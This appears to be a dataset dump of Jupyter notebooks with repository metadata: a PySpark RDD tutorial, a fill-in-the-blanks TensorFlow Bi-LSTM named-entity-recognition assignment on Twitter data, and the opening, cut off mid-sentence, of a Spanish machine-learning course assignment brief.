[ [ [ "# Introduction to Spark and Python\n\nLet's learn how to use Spark with Python by using the pyspark library! Make sure to view the video lecture explaining Spark and RDDs before continuing on with this code.\n\nThis notebook will serve as reference code for the Big Data section of the course involving Amazon Web Services. The video will provide fuller explanations for what the code is doing.\n\n## Creating a SparkContext\n\nFirst we need to create a SparkContext. We will import this from pyspark:", "_____no_output_____" ] ], [ [ "from pyspark import SparkContext", "_____no_output_____" ] ], [ [ "Now create the SparkContext,A SparkContext represents the connection to a Spark cluster, and can be used to create an RDD and broadcast variables on that cluster.\n\n*Note! You can only have one SparkContext at a time the way we are running things here.*", "_____no_output_____" ] ], [ [ "sc = SparkContext()", "_____no_output_____" ] ], [ [ "## Basic Operations\n\nWe're going to start with a 'hello world' example, which is just reading a text file. First let's create a text file.\n___", "_____no_output_____" ], [ "Let's write an example text file to read, we'll use some special jupyter notebook commands for this, but feel free to use any .txt file:", "_____no_output_____" ] ], [ [ "%%writefile example.txt\nfirst line\nsecond line\nthird line\nfourth line", "Overwriting example.txt\n" ] ], [ [ "### Creating the RDD", "_____no_output_____" ], [ "Now we can take in the textfile using the **textFile** method off of the SparkContext we created. This method will read a text file from HDFS, a local file system (available on all\nnodes), or any Hadoop-supported file system URI, and return it as an RDD of Strings.", "_____no_output_____" ] ], [ [ "textFile = sc.textFile('example.txt')", "_____no_output_____" ] ], [ [ "Spark’s primary abstraction is a distributed collection of items called a Resilient Distributed Dataset (RDD). RDDs can be created from Hadoop InputFormats (such as HDFS files) or by transforming other RDDs. \n\n### Actions\n\nWe have just created an RDD using the textFile method and can perform operations on this object, such as counting the rows.\n\nRDDs have actions, which return values, and transformations, which return pointers to new RDDs. Let’s start with a few actions:", "_____no_output_____" ] ], [ [ "textFile.count()", "_____no_output_____" ], [ "textFile.first()", "_____no_output_____" ] ], [ [ "### Transformations\n\nNow we can use transformations, for example the filter transformation will return a new RDD with a subset of items in the file. Let's create a sample transformation using the filter() method. This method (just like Python's own filter function) will only return elements that satisfy the condition. Let's try looking for lines that contain the word 'second'. In which case, there should only be one line that has that.", "_____no_output_____" ] ], [ [ "secfind = textFile.filter(lambda line: 'second' in line)", "_____no_output_____" ], [ "# RDD\nsecfind", "_____no_output_____" ], [ "# Perform action on transformation\nsecfind.collect()", "_____no_output_____" ], [ "# Perform action on transformation\nsecfind.count()", "_____no_output_____" ] ], [ [ "Notice how the transformations won't display an output and won't be run until an action is called. In the next lecture: Advanced Spark and Python we will begin to see many more examples of this transformation and action relationship!\n\n# Great Job!", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ] ]
cb20112cd84e0dafb6a54b9300189e1a09928161
36,459
ipynb
Jupyter Notebook
week2/week2-NER.ipynb
rahul263-stack/PROJECT-Dump
d8b1cfe0da8cad9fe2f3bbd427334b979c7d2c09
[ "MIT" ]
1
2020-04-06T04:41:56.000Z
2020-04-06T04:41:56.000Z
week2/week2-NER.ipynb
rahul263-stack/quarantine
d8b1cfe0da8cad9fe2f3bbd427334b979c7d2c09
[ "MIT" ]
null
null
null
week2/week2-NER.ipynb
rahul263-stack/quarantine
d8b1cfe0da8cad9fe2f3bbd427334b979c7d2c09
[ "MIT" ]
null
null
null
38.257083
798
0.594833
[ [ [ "# Recognize named entities on Twitter with LSTMs\n\nIn this assignment, you will use a recurrent neural network to solve Named Entity Recognition (NER) problem. NER is a common task in natural language processing systems. It serves for extraction such entities from the text as persons, organizations, locations, etc. In this task you will experiment to recognize named entities from Twitter.\n\nFor example, we want to extract persons' and organizations' names from the text. Than for the input text:\n\n Ian Goodfellow works for Google Brain\n\na NER model needs to provide the following sequence of tags:\n\n B-PER I-PER O O B-ORG I-ORG\n\nWhere *B-* and *I-* prefixes stand for the beginning and inside of the entity, while *O* stands for out of tag or no tag. Markup with the prefix scheme is called *BIO markup*. This markup is introduced for distinguishing of consequent entities with similar types.\n\nA solution of the task will be based on neural networks, particularly, on Bi-Directional Long Short-Term Memory Networks (Bi-LSTMs).\n\n### Libraries\n\nFor this task you will need the following libraries:\n - [Tensorflow](https://www.tensorflow.org) — an open-source software library for Machine Intelligence.\n \nIn this assignment, we use Tensorflow 1.15.0. You can install it with pip:\n\n !pip install tensorflow==1.15.0\n \n - [Numpy](http://www.numpy.org) — a package for scientific computing.\n \nIf you have never worked with Tensorflow, you would probably need to read some tutorials during your work on this assignment, e.g. [this one](https://www.tensorflow.org/tutorials/recurrent) could be a good starting point. ", "_____no_output_____" ], [ "### Data\n\nThe following cell will download all data required for this assignment into the folder `week2/data`.", "_____no_output_____" ] ], [ [ "try:\n import google.colab\n IN_COLAB = True\nexcept:\n IN_COLAB = False\n\nif IN_COLAB:\n ! wget https://raw.githubusercontent.com/hse-aml/natural-language-processing/master/setup_google_colab.py -O setup_google_colab.py\n import setup_google_colab\n setup_google_colab.setup_week2()\n\nimport sys\nsys.path.append(\"..\")\nfrom common.download_utils import download_week2_resources\n\ndownload_week2_resources()", "_____no_output_____" ] ], [ [ "### Load the Twitter Named Entity Recognition corpus\n\nWe will work with a corpus, which contains tweets with NE tags. Every line of a file contains a pair of a token (word/punctuation symbol) and a tag, separated by a whitespace. Different tweets are separated by an empty line.\n\nThe function *read_data* reads a corpus from the *file_path* and returns two lists: one with tokens and one with the corresponding tags. You need to complete this function by adding a code, which will replace a user's nickname to `<USR>` token and any URL to `<URL>` token. You could think that a URL and a nickname are just strings which start with *http://* or *https://* in case of URLs and a *@* symbol for nicknames.", "_____no_output_____" ] ], [ [ "def read_data(file_path):\n tokens = []\n tags = []\n \n tweet_tokens = []\n tweet_tags = []\n for line in open(file_path, encoding='utf-8'):\n line = line.strip()\n if not line:\n if tweet_tokens:\n tokens.append(tweet_tokens)\n tags.append(tweet_tags)\n tweet_tokens = []\n tweet_tags = []\n else:\n token, tag = line.split()\n # Replace all urls with <URL> token\n # Replace all users with <USR> token\n\n ######################################\n ######### YOUR CODE HERE #############\n ######################################\n \n tweet_tokens.append(token)\n tweet_tags.append(tag)\n \n return tokens, tags", "_____no_output_____" ] ], [ [ "And now we can load three separate parts of the dataset:\n - *train* data for training the model;\n - *validation* data for evaluation and hyperparameters tuning;\n - *test* data for final evaluation of the model.", "_____no_output_____" ] ], [ [ "train_tokens, train_tags = read_data('data/train.txt')\nvalidation_tokens, validation_tags = read_data('data/validation.txt')\ntest_tokens, test_tags = read_data('data/test.txt')", "_____no_output_____" ] ], [ [ "You should always understand what kind of data you deal with. For this purpose, you can print the data running the following cell:", "_____no_output_____" ] ], [ [ "for i in range(3):\n for token, tag in zip(train_tokens[i], train_tags[i]):\n print('%s\\t%s' % (token, tag))\n print()", "_____no_output_____" ] ], [ [ "### Prepare dictionaries\n\nTo train a neural network, we will use two mappings: \n- {token}$\\to${token id}: address the row in embeddings matrix for the current token;\n- {tag}$\\to${tag id}: one-hot ground truth probability distribution vectors for computing the loss at the output of the network.\n\nNow you need to implement the function *build_dict* which will return {token or tag}$\\to${index} and vice versa. ", "_____no_output_____" ] ], [ [ "from collections import defaultdict", "_____no_output_____" ], [ "def build_dict(tokens_or_tags, special_tokens):\n \"\"\"\n tokens_or_tags: a list of lists of tokens or tags\n special_tokens: some special tokens\n \"\"\"\n # Create a dictionary with default value 0\n tok2idx = defaultdict(lambda: 0)\n idx2tok = []\n \n # Create mappings from tokens (or tags) to indices and vice versa.\n # At first, add special tokens (or tags) to the dictionaries.\n # The first special token must have index 0.\n \n # Mapping tok2idx should contain each token or tag only once. \n # To do so, you should:\n # 1. extract unique tokens/tags from the tokens_or_tags variable, which is not\n # occur in special_tokens (because they could have non-empty intersection)\n # 2. index them (for example, you can add them into the list idx2tok\n # 3. for each token/tag save the index into tok2idx).\n \n ######################################\n ######### YOUR CODE HERE #############\n ######################################\n \n return tok2idx, idx2tok", "_____no_output_____" ] ], [ [ "After implementing the function *build_dict* you can make dictionaries for tokens and tags. Special tokens in our case will be:\n - `<UNK>` token for out of vocabulary tokens;\n - `<PAD>` token for padding sentence to the same length when we create batches of sentences.", "_____no_output_____" ] ], [ [ "special_tokens = ['<UNK>', '<PAD>']\nspecial_tags = ['O']\n\n# Create dictionaries \ntoken2idx, idx2token = build_dict(train_tokens + validation_tokens, special_tokens)\ntag2idx, idx2tag = build_dict(train_tags, special_tags)", "_____no_output_____" ] ], [ [ "The next additional functions will help you to create the mapping between tokens and ids for a sentence. ", "_____no_output_____" ] ], [ [ "def words2idxs(tokens_list):\n return [token2idx[word] for word in tokens_list]\n\ndef tags2idxs(tags_list):\n return [tag2idx[tag] for tag in tags_list]\n\ndef idxs2words(idxs):\n return [idx2token[idx] for idx in idxs]\n\ndef idxs2tags(idxs):\n return [idx2tag[idx] for idx in idxs]", "_____no_output_____" ] ], [ [ "### Generate batches\n\nNeural Networks are usually trained with batches. It means that weight updates of the network are based on several sequences at every single time. The tricky part is that all sequences within a batch need to have the same length. So we will pad them with a special `<PAD>` token. It is also a good practice to provide RNN with sequence lengths, so it can skip computations for padding parts. We provide the batching function *batches_generator* readily available for you to save time. ", "_____no_output_____" ] ], [ [ "def batches_generator(batch_size, tokens, tags,\n shuffle=True, allow_smaller_last_batch=True):\n \"\"\"Generates padded batches of tokens and tags.\"\"\"\n \n n_samples = len(tokens)\n if shuffle:\n order = np.random.permutation(n_samples)\n else:\n order = np.arange(n_samples)\n\n n_batches = n_samples // batch_size\n if allow_smaller_last_batch and n_samples % batch_size:\n n_batches += 1\n\n for k in range(n_batches):\n batch_start = k * batch_size\n batch_end = min((k + 1) * batch_size, n_samples)\n current_batch_size = batch_end - batch_start\n x_list = []\n y_list = []\n max_len_token = 0\n for idx in order[batch_start: batch_end]:\n x_list.append(words2idxs(tokens[idx]))\n y_list.append(tags2idxs(tags[idx]))\n max_len_token = max(max_len_token, len(tags[idx]))\n \n # Fill in the data into numpy nd-arrays filled with padding indices.\n x = np.ones([current_batch_size, max_len_token], dtype=np.int32) * token2idx['<PAD>']\n y = np.ones([current_batch_size, max_len_token], dtype=np.int32) * tag2idx['O']\n lengths = np.zeros(current_batch_size, dtype=np.int32)\n for n in range(current_batch_size):\n utt_len = len(x_list[n])\n x[n, :utt_len] = x_list[n]\n lengths[n] = utt_len\n y[n, :utt_len] = y_list[n]\n yield x, y, lengths", "_____no_output_____" ] ], [ [ "## Build a recurrent neural network\n\nThis is the most important part of the assignment. Here we will specify the network architecture based on TensorFlow building blocks. It's fun and easy as a lego constructor! We will create an LSTM network which will produce probability distribution over tags for each token in a sentence. To take into account both right and left contexts of the token, we will use Bi-Directional LSTM (Bi-LSTM). Dense layer will be used on top to perform tag classification. ", "_____no_output_____" ] ], [ [ "import tensorflow as tf\nimport numpy as np", "_____no_output_____" ], [ "class BiLSTMModel():\n pass", "_____no_output_____" ] ], [ [ "First, we need to create [placeholders](https://www.tensorflow.org/api_docs/python/tf/compat/v1/placeholder) to specify what data we are going to feed into the network during the execution time. For this task we will need the following placeholders:\n - *input_batch* — sequences of words (the shape equals to [batch_size, sequence_len]);\n - *ground_truth_tags* — sequences of tags (the shape equals to [batch_size, sequence_len]);\n - *lengths* — lengths of not padded sequences (the shape equals to [batch_size]);\n - *dropout_ph* — dropout keep probability; this placeholder has a predefined value 1;\n - *learning_rate_ph* — learning rate; we need this placeholder because we want to change the value during training.\n\nIt could be noticed that we use *None* in the shapes in the declaration, which means that data of any size can be feeded. \n\nYou need to complete the function *declare_placeholders*.", "_____no_output_____" ] ], [ [ "def declare_placeholders(self):\n \"\"\"Specifies placeholders for the model.\"\"\"\n\n # Placeholders for input and ground truth output.\n self.input_batch = tf.placeholder(dtype=tf.int32, shape=[None, None], name='input_batch') \n self.ground_truth_tags = ######### YOUR CODE HERE #############\n \n # Placeholder for lengths of the sequences.\n self.lengths = tf.placeholder(dtype=tf.int32, shape=[None], name='lengths') \n \n # Placeholder for a dropout keep probability. If we don't feed\n # a value for this placeholder, it will be equal to 1.0.\n self.dropout_ph = tf.placeholder_with_default(tf.cast(1.0, tf.float32), shape=[])\n \n # Placeholder for a learning rate (tf.float32).\n self.learning_rate_ph = ######### YOUR CODE HERE #############", "_____no_output_____" ], [ "BiLSTMModel.__declare_placeholders = classmethod(declare_placeholders)", "_____no_output_____" ] ], [ [ "Now, let us specify the layers of the neural network. First, we need to perform some preparatory steps: \n \n- Create embeddings matrix with [tf.Variable](https://www.tensorflow.org/api_docs/python/tf/Variable). Specify its name (*embeddings_matrix*), type (*tf.float32*), and initialize with random values.\n- Create forward and backward LSTM cells. TensorFlow provides a number of RNN cells ready for you. We suggest that you use *LSTMCell*, but you can also experiment with other types, e.g. GRU cells. [This](http://colah.github.io/posts/2015-08-Understanding-LSTMs/) blogpost could be interesting if you want to learn more about the differences.\n- Wrap your cells with [DropoutWrapper](https://www.tensorflow.org/api_docs/python/tf/contrib/rnn/DropoutWrapper). Dropout is an important regularization technique for neural networks. Specify all keep probabilities using the dropout placeholder that we created before.\n \nAfter that, you can build the computation graph that transforms an input_batch:\n\n- [Look up](https://www.tensorflow.org/api_docs/python/tf/nn/embedding_lookup) embeddings for an *input_batch* in the prepared *embedding_matrix*.\n- Pass the embeddings through [Bidirectional Dynamic RNN](https://www.tensorflow.org/api_docs/python/tf/nn/bidirectional_dynamic_rnn) with the specified forward and backward cells. Use the lengths placeholder here to avoid computations for padding tokens inside the RNN.\n- Create a dense layer on top. Its output will be used directly in loss function. \n \nFill in the code below. In case you need to debug something, the easiest way is to check that tensor shapes of each step match the expected ones. \n ", "_____no_output_____" ] ], [ [ "def build_layers(self, vocabulary_size, embedding_dim, n_hidden_rnn, n_tags):\n \"\"\"Specifies bi-LSTM architecture and computes logits for inputs.\"\"\"\n \n # Create embedding variable (tf.Variable) with dtype tf.float32\n initial_embedding_matrix = np.random.randn(vocabulary_size, embedding_dim) / np.sqrt(embedding_dim)\n embedding_matrix_variable = ######### YOUR CODE HERE #############\n \n # Create RNN cells (for example, tf.nn.rnn_cell.BasicLSTMCell) with n_hidden_rnn number of units \n # and dropout (tf.nn.rnn_cell.DropoutWrapper), initializing all *_keep_prob with dropout placeholder.\n forward_cell = ######### YOUR CODE HERE #############\n backward_cell = ######### YOUR CODE HERE #############\n\n # Look up embeddings for self.input_batch (tf.nn.embedding_lookup).\n # Shape: [batch_size, sequence_len, embedding_dim].\n embeddings = ######### YOUR CODE HERE #############\n \n # Pass them through Bidirectional Dynamic RNN (tf.nn.bidirectional_dynamic_rnn).\n # Shape: [batch_size, sequence_len, 2 * n_hidden_rnn]. \n # Also don't forget to initialize sequence_length as self.lengths and dtype as tf.float32.\n (rnn_output_fw, rnn_output_bw), _ = ######### YOUR CODE HERE #############\n rnn_output = tf.concat([rnn_output_fw, rnn_output_bw], axis=2)\n\n # Dense layer on top.\n # Shape: [batch_size, sequence_len, n_tags]. \n self.logits = tf.layers.dense(rnn_output, n_tags, activation=None)", "_____no_output_____" ], [ "BiLSTMModel.__build_layers = classmethod(build_layers)", "_____no_output_____" ] ], [ [ "To compute the actual predictions of the neural network, you need to apply [softmax](https://www.tensorflow.org/api_docs/python/tf/nn/softmax) to the last layer and find the most probable tags with [argmax](https://www.tensorflow.org/api_docs/python/tf/argmax).", "_____no_output_____" ] ], [ [ "def compute_predictions(self):\n \"\"\"Transforms logits to probabilities and finds the most probable tags.\"\"\"\n \n # Create softmax (tf.nn.softmax) function\n softmax_output = ######### YOUR CODE HERE #############\n \n # Use argmax (tf.argmax) to get the most probable tags\n # Don't forget to set axis=-1\n # otherwise argmax will be calculated in a wrong way\n self.predictions = ######### YOUR CODE HERE #############", "_____no_output_____" ], [ "BiLSTMModel.__compute_predictions = classmethod(compute_predictions)", "_____no_output_____" ] ], [ [ "During training we do not need predictions of the network, but we need a loss function. We will use [cross-entropy loss](http://ml-cheatsheet.readthedocs.io/en/latest/loss_functions.html#cross-entropy), efficiently implemented in TF as \n[cross entropy with logits](https://www.tensorflow.org/api_docs/python/tf/nn/softmax_cross_entropy_with_logits_v2). Note that it should be applied to logits of the model (not to softmax probabilities!). Also note, that we do not want to take into account loss terms coming from `<PAD>` tokens. So we need to mask them out, before computing [mean](https://www.tensorflow.org/api_docs/python/tf/reduce_mean).", "_____no_output_____" ] ], [ [ "def compute_loss(self, n_tags, PAD_index):\n \"\"\"Computes masked cross-entopy loss with logits.\"\"\"\n \n # Create cross entropy function function (tf.nn.softmax_cross_entropy_with_logits_v2)\n ground_truth_tags_one_hot = tf.one_hot(self.ground_truth_tags, n_tags)\n loss_tensor = ######### YOUR CODE HERE #############\n \n mask = tf.cast(tf.not_equal(self.input_batch, PAD_index), tf.float32)\n # Create loss function which doesn't operate with <PAD> tokens (tf.reduce_mean)\n # Be careful that the argument of tf.reduce_mean should be\n # multiplication of mask and loss_tensor.\n self.loss = ######### YOUR CODE HERE #############", "_____no_output_____" ], [ "BiLSTMModel.__compute_loss = classmethod(compute_loss)", "_____no_output_____" ] ], [ [ "The last thing to specify is how we want to optimize the loss. \nWe suggest that you use [Adam](https://www.tensorflow.org/api_docs/python/tf/train/AdamOptimizer) optimizer with a learning rate from the corresponding placeholder. \nYou will also need to apply clipping to eliminate exploding gradients. It can be easily done with [clip_by_norm](https://www.tensorflow.org/api_docs/python/tf/clip_by_norm) function. ", "_____no_output_____" ] ], [ [ "def perform_optimization(self):\n \"\"\"Specifies the optimizer and train_op for the model.\"\"\"\n \n # Create an optimizer (tf.train.AdamOptimizer)\n self.optimizer = ######### YOUR CODE HERE #############\n self.grads_and_vars = self.optimizer.compute_gradients(self.loss)\n \n # Gradient clipping (tf.clip_by_norm) for self.grads_and_vars\n # Pay attention that you need to apply this operation only for gradients \n # because self.grads_and_vars also contains variables.\n # list comprehension might be useful in this case.\n clip_norm = tf.cast(1.0, tf.float32)\n self.grads_and_vars = ######### YOUR CODE HERE #############\n \n self.train_op = self.optimizer.apply_gradients(self.grads_and_vars)", "_____no_output_____" ], [ "BiLSTMModel.__perform_optimization = classmethod(perform_optimization)", "_____no_output_____" ] ], [ [ "Congratulations! You have specified all the parts of your network. You may have noticed, that we didn't deal with any real data yet, so what you have written is just recipes on how the network should function.\nNow we will put them to the constructor of our Bi-LSTM class to use it in the next section. ", "_____no_output_____" ] ], [ [ "def init_model(self, vocabulary_size, n_tags, embedding_dim, n_hidden_rnn, PAD_index):\n self.__declare_placeholders()\n self.__build_layers(vocabulary_size, embedding_dim, n_hidden_rnn, n_tags)\n self.__compute_predictions()\n self.__compute_loss(n_tags, PAD_index)\n self.__perform_optimization()", "_____no_output_____" ], [ "BiLSTMModel.__init__ = classmethod(init_model)", "_____no_output_____" ] ], [ [ "## Train the network and predict tags", "_____no_output_____" ], [ "[Session.run](https://www.tensorflow.org/api_docs/python/tf/Session#run) is a point which initiates computations in the graph that we have defined. To train the network, we need to compute *self.train_op*, which was declared in *perform_optimization*. To predict tags, we just need to compute *self.predictions*. Anyway, we need to feed actual data through the placeholders that we defined before. ", "_____no_output_____" ] ], [ [ "def train_on_batch(self, session, x_batch, y_batch, lengths, learning_rate, dropout_keep_probability):\n feed_dict = {self.input_batch: x_batch,\n self.ground_truth_tags: y_batch,\n self.learning_rate_ph: learning_rate,\n self.dropout_ph: dropout_keep_probability,\n self.lengths: lengths}\n \n session.run(self.train_op, feed_dict=feed_dict)", "_____no_output_____" ], [ "BiLSTMModel.train_on_batch = classmethod(train_on_batch)", "_____no_output_____" ] ], [ [ "Implement the function *predict_for_batch* by initializing *feed_dict* with input *x_batch* and *lengths* and running the *session* for *self.predictions*.", "_____no_output_____" ] ], [ [ "def predict_for_batch(self, session, x_batch, lengths):\n ######################################\n ######### YOUR CODE HERE #############\n ######################################\n \n return predictions", "_____no_output_____" ], [ "BiLSTMModel.predict_for_batch = classmethod(predict_for_batch)", "_____no_output_____" ] ], [ [ "We finished with necessary methods of our BiLSTMModel model and almost ready to start experimenting.\n\n### Evaluation \nTo simplify the evaluation process we provide two functions for you:\n - *predict_tags*: uses a model to get predictions and transforms indices to tokens and tags;\n - *eval_conll*: calculates precision, recall and F1 for the results.", "_____no_output_____" ] ], [ [ "from evaluation import precision_recall_f1", "_____no_output_____" ], [ "def predict_tags(model, session, token_idxs_batch, lengths):\n \"\"\"Performs predictions and transforms indices to tokens and tags.\"\"\"\n \n tag_idxs_batch = model.predict_for_batch(session, token_idxs_batch, lengths)\n \n tags_batch, tokens_batch = [], []\n for tag_idxs, token_idxs in zip(tag_idxs_batch, token_idxs_batch):\n tags, tokens = [], []\n for tag_idx, token_idx in zip(tag_idxs, token_idxs):\n tags.append(idx2tag[tag_idx])\n tokens.append(idx2token[token_idx])\n tags_batch.append(tags)\n tokens_batch.append(tokens)\n return tags_batch, tokens_batch\n \n \ndef eval_conll(model, session, tokens, tags, short_report=True):\n \"\"\"Computes NER quality measures using CONLL shared task script.\"\"\"\n \n y_true, y_pred = [], []\n for x_batch, y_batch, lengths in batches_generator(1, tokens, tags):\n tags_batch, tokens_batch = predict_tags(model, session, x_batch, lengths)\n if len(x_batch[0]) != len(tags_batch[0]):\n raise Exception(\"Incorrect length of prediction for the input, \"\n \"expected length: %i, got: %i\" % (len(x_batch[0]), len(tags_batch[0])))\n predicted_tags = []\n ground_truth_tags = []\n for gt_tag_idx, pred_tag, token in zip(y_batch[0], tags_batch[0], tokens_batch[0]): \n if token != '<PAD>':\n ground_truth_tags.append(idx2tag[gt_tag_idx])\n predicted_tags.append(pred_tag)\n\n # We extend every prediction and ground truth sequence with 'O' tag\n # to indicate a possible end of entity.\n y_true.extend(ground_truth_tags + ['O'])\n y_pred.extend(predicted_tags + ['O'])\n \n results = precision_recall_f1(y_true, y_pred, print_results=True, short_report=short_report)\n return results", "_____no_output_____" ] ], [ [ "## Run your experiment", "_____no_output_____" ], [ "Create *BiLSTMModel* model with the following parameters:\n - *vocabulary_size* — number of tokens;\n - *n_tags* — number of tags;\n - *embedding_dim* — dimension of embeddings, recommended value: 200;\n - *n_hidden_rnn* — size of hidden layers for RNN, recommended value: 200;\n - *PAD_index* — an index of the padding token (`<PAD>`).\n\nSet hyperparameters. You might want to start with the following recommended values:\n- *batch_size*: 32;\n- 4 epochs;\n- starting value of *learning_rate*: 0.005\n- *learning_rate_decay*: a square root of 2;\n- *dropout_keep_probability*: try several values: 0.1, 0.5, 0.9.\n\nHowever, feel free to conduct more experiments to tune hyperparameters and earn extra points for the assignment.", "_____no_output_____" ] ], [ [ "tf.reset_default_graph()\n\nmodel = ######### YOUR CODE HERE #############\n\nbatch_size = ######### YOUR CODE HERE #############\nn_epochs = ######### YOUR CODE HERE #############\nlearning_rate = ######### YOUR CODE HERE #############\nlearning_rate_decay = ######### YOUR CODE HERE #############\ndropout_keep_probability = ######### YOUR CODE HERE #############", "_____no_output_____" ] ], [ [ "If you got an error *\"Tensor conversion requested dtype float64 for Tensor with dtype float32\"* in this point, check if there are variables without dtype initialised. Set the value of dtype equals to *tf.float32* for such variables.", "_____no_output_____" ], [ "Finally, we are ready to run the training!", "_____no_output_____" ] ], [ [ "sess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nprint('Start training... \\n')\nfor epoch in range(n_epochs):\n # For each epoch evaluate the model on train and validation data\n print('-' * 20 + ' Epoch {} '.format(epoch+1) + 'of {} '.format(n_epochs) + '-' * 20)\n print('Train data evaluation:')\n eval_conll(model, sess, train_tokens, train_tags, short_report=True)\n print('Validation data evaluation:')\n eval_conll(model, sess, validation_tokens, validation_tags, short_report=True)\n \n # Train the model\n for x_batch, y_batch, lengths in batches_generator(batch_size, train_tokens, train_tags):\n model.train_on_batch(sess, x_batch, y_batch, lengths, learning_rate, dropout_keep_probability)\n \n # Decaying the learning rate\n learning_rate = learning_rate / learning_rate_decay\n \nprint('...training finished.')", "_____no_output_____" ] ], [ [ "Now let us see full quality reports for the final model on train, validation, and test sets. To give you a hint whether you have implemented everything correctly, you might expect F-score about 40% on the validation set.\n\n**The output of the cell below (as well as the output of all the other cells) should be present in the notebook for peer2peer review!**", "_____no_output_____" ] ], [ [ "print('-' * 20 + ' Train set quality: ' + '-' * 20)\ntrain_results = eval_conll(model, sess, train_tokens, train_tags, short_report=False)\n\nprint('-' * 20 + ' Validation set quality: ' + '-' * 20)\nvalidation_results = ######### YOUR CODE HERE #############\n\nprint('-' * 20 + ' Test set quality: ' + '-' * 20)\ntest_results = ######### YOUR CODE HERE #############", "_____no_output_____" ] ], [ [ "### Conclusions\n\nCould we say that our model is state of the art and the results are acceptable for the task? Definately, we can say so. Nowadays, Bi-LSTM is one of the state of the art approaches for solving NER problem and it outperforms other classical methods. Despite the fact that we used small training corpora (in comparison with usual sizes of corpora in Deep Learning), our results are quite good. In addition, in this task there are many possible named entities and for some of them we have only several dozens of trainig examples, which is definately small. However, the implemented model outperforms classical CRFs for this task. Even better results could be obtained by some combinations of several types of methods, e.g. see [this](https://arxiv.org/abs/1603.01354) paper if you are interested.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb20279df79f321c9ad9ba6907475201c9eee2d8
12,023
ipynb
Jupyter Notebook
labs/[ANN]Taller1_INF398_2021_II.ipynb
Tomas-Werth/MAT281-portafolio
3baac1a83f1eb6c910a1c165e2afd2e48e2276e9
[ "MIT" ]
null
null
null
labs/[ANN]Taller1_INF398_2021_II.ipynb
Tomas-Werth/MAT281-portafolio
3baac1a83f1eb6c910a1c165e2afd2e48e2276e9
[ "MIT" ]
null
null
null
labs/[ANN]Taller1_INF398_2021_II.ipynb
Tomas-Werth/MAT281-portafolio
3baac1a83f1eb6c910a1c165e2afd2e48e2276e9
[ "MIT" ]
null
null
null
47.14902
483
0.675455
[ [ [ "<center><img src=\"http://www.exalumnos.usm.cl/wp-content/uploads/2015/06/Isotipo-Negro.gif\" title=\"Title text\" width=\"30%\" /></center>\n\n<hr style=\"height:2px;border:none\"/>\n<h1 align='center'> INF-398 Aprendizaje Automático </h1>\n\n<H3 align='center'> Tarea/Taller 1 </H3>\n<hr style=\"height:2px;border:none\"/>\n", "_____no_output_____" ], [ "# Temas", "_____no_output_____" ], [ "* Clasificadores Discriminativos Clásicos\n* Clasificadores Generativos Clásicos\n* Evaluación de Clasificadores\n", "_____no_output_____" ], [ "# Reglas & Formalidades\n\n* Pueden trabajar en equipos de 2 a 3 personas. \n* Los equipos deben ser inscritos antes del 24 Septiembre.\n* Pueden reusar código visto en clases y/o recolectar código/ideas de otros sitios, mencionando al autor y entregando un link a la fuente. \n* Si resulta necesaria, la intervención de personas ajenas al grupo (e.g. experto) debe ser declarada y justificada.\n* Tener roles dentro del equipo está bien, pero al final del proceso, cada miembro debe entender y estar en condiciones de exponer todo el trabajo realizado. \n", "_____no_output_____" ], [ "## Entregables \n\n", "_____no_output_____" ], [ "\n> * **Video:** Se debe preparar un video explicativo de **15 a 20 minutos** donde se describe la metodología utilizada, los resultados obtenidos y las conclusiones de la experiencia. \n\n> * **Código:** Se debe enviar un jupyter notebook con el código utilizado, de modo que sea posible **reproducir los resultados** presentados. Como alternativa, se puede entregar un link Github con el código fuente, incluyendo instrucciones precisas para ejecutar los experimentos. En cualquier caso (notebook o repo) el código debe estar ordenado y seccionado apropiadamente.\n\n> * **Conformidad Ética:** Se debe incluir una breve declaración ética en que se indique que el trabajo que se está enviando es un trabajo original, desarollado por los autores en conformidad con todas reglas antes mencionadas. Se debe también mencionar brevemente cuál fue la contribución de cada miembro del equipo. La declaración puede ser parte del notebook o estar en un archivo dentro del repo.\n\n> * **Defensa en vivo (video-conferencia):** El día de clases agendado para la discusión del taller, se seleccionarán aleatoriamente algunos equipos que presentarán oralmente su trabajo ante el curso. Los autores serán evaluados considerando la discusión y debate que generen entre sus pares. Los puntos obtenidos (positivos o negativos) se sumarán a la nota final de taller.", "_____no_output_____" ], [ "## Fechas", "_____no_output_____" ], [ "> * Defensas: 15 de Octubre, horario de clases.\n> * Fecha de entrega de vídeo: 16 de Octubre 23:59 Hrs. (1 días después de encuentro).\n> * Fecha de entrega de Jupyter (notebook): 15 de Octubre 08:00 (se pueden hacer actualizaciones hasta el 16 de Octubre 23:59 Hrs.). \n\n", "_____no_output_____" ], [ "# Instrucciones", "_____no_output_____" ], [ "La tarea se divide en dos secciones:\n\n\n\n> **1. Pregunta de Investigación**. Para esta parte, los autores deben elegir una hipótesis de investigación y diseñar un procedimiento experimental que permita reunir evidencia en contra o a favor de la misma. Es legítimo tomar una posición *a-priori* en base a lo que han aprendido en el curso, pero es importante 